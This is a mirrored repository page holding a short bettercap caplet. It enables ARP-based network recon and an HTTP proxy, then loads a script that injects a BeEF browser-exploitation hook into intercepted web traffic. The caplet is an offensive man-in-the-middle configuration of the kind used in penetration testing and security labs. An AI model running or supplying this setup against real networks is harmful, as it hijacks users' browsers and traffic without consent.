mirror of
https://github.com/bettercap/bettercap
synced 2025-07-12 08:07:00 -07:00
15 lines
232 B
Text
15 lines
232 B
Text
# inject beef hook
|
|
set http.proxy.script caplets/beef-inject.js
|
|
# keep reading arp table for network mapping
|
|
net.recon on
|
|
# redirect http traffic to a proxy
|
|
http.proxy on
|
|
# wait for everything to start properly
|
|
sleep 1
|
|
active
|
|
|
|
|
|
|
|
|
|
|
|
|